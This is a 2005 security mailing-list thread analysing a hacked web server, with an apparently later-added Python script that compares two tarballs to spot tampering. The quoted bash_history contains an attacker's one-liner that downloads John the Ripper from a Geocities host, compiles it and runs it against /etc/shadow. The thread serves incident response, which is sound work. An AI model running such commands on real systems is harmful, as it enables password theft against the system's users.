Re: SSH compiled with backdoor

From: Javier Fernandez-Sanguino (jfernandez_at_germinus.com)
Date: 08/30/05

Next message: Alfred Huger: "Call for new mailing lists @ SecurityFocus"
Date: Tue, 30 Aug 2005 12:43:31 +0200
To: steve@example.org

steve@example.org wrote:

> Hi!
>
> One of my web servers was hacked on July 17, 2005. bash_history
> showed:
>
> w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
> john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
> linux-x86-any-elf;cd ../run;./john /etc/shadow

(...)

> According to john, a couple of users had weak passwords, but root
> seemed well protected. From looking in all the bash_history, it
> appears the hacker came in from the website account, and did an su
> from there.

He might have escalated privileges to root from the website account
using a kernel root exploit. You did not mention whose bash_history
you provided, but from the above john run it is evident that he is
already running as root (as he is able to read /etc/shadow).

I wonder why he cracked those passwords if he already had root access.
Maybe he wanted to use them to propagate the attack to nearby systems
or to feed the vulnerable passwords to his personal password file.

BTW, 'securedro' seems to have been removed from Geocities, but not
'cretu_2004' (where the john sources are). The john sources downloaded
from there, though, seem to be the same as those downloaded from
Openwall. I expected them to have "improved" the run/password.lst and
added common (for them) passwords there.

Regards

Javier
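As an added illustration of the check Javier describes (comparing the attacker-hosted john tarball with the upstream Openwall release), and not code from the original thread: the script below diffs two .tar.gz archives member by member and reports added, removed and modified files, which is how a tampered run/password.lst would show up. Both archives are small constructed stand-ins built in memory; their file names and contents are assumptions, not the real john-1.6 contents.

```python
import hashlib
import io
import tarfile


def _member_digests(tar_bytes):
    """Map each regular file in a gzip tarball to its SHA-256 digest."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                data = tar.extractfile(member).read()
                digests[member.name] = hashlib.sha256(data).hexdigest()
    return digests


def compare_tarballs(reference_bytes, suspect_bytes):
    """Return the member names that were added, removed or modified
    in the suspect archive relative to the reference archive."""
    ref = _member_digests(reference_bytes)
    sus = _member_digests(suspect_bytes)
    return {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "modified": sorted(n for n in ref if n in sus and ref[n] != sus[n]),
    }


def build_tarball(files):
    """Build a gzip tarball in memory from {path: bytes} (constructed data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed stand-ins: a pristine "upstream" copy and a copy whose
# wordlist was extended and which carries one extra file.
UPSTREAM = build_tarball({
    "john-1.6/run/password.lst": b"12345\npassword\n",
    "john-1.6/src/Makefile": b"all:\n",
})
TAMPERED = build_tarball({
    "john-1.6/run/password.lst": b"12345\npassword\nhunter2\n",
    "john-1.6/src/Makefile": b"all:\n",
    "john-1.6/run/extra.lst": b"qwerty\n",
})

if __name__ == "__main__":
    for kind, names in compare_tarballs(UPSTREAM, TAMPERED).items():
        print(kind, names)
```

With a real download the same comparison works on the bytes of the two fetched archives, and an empty report for all three lists means the copies are byte-identical in content.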

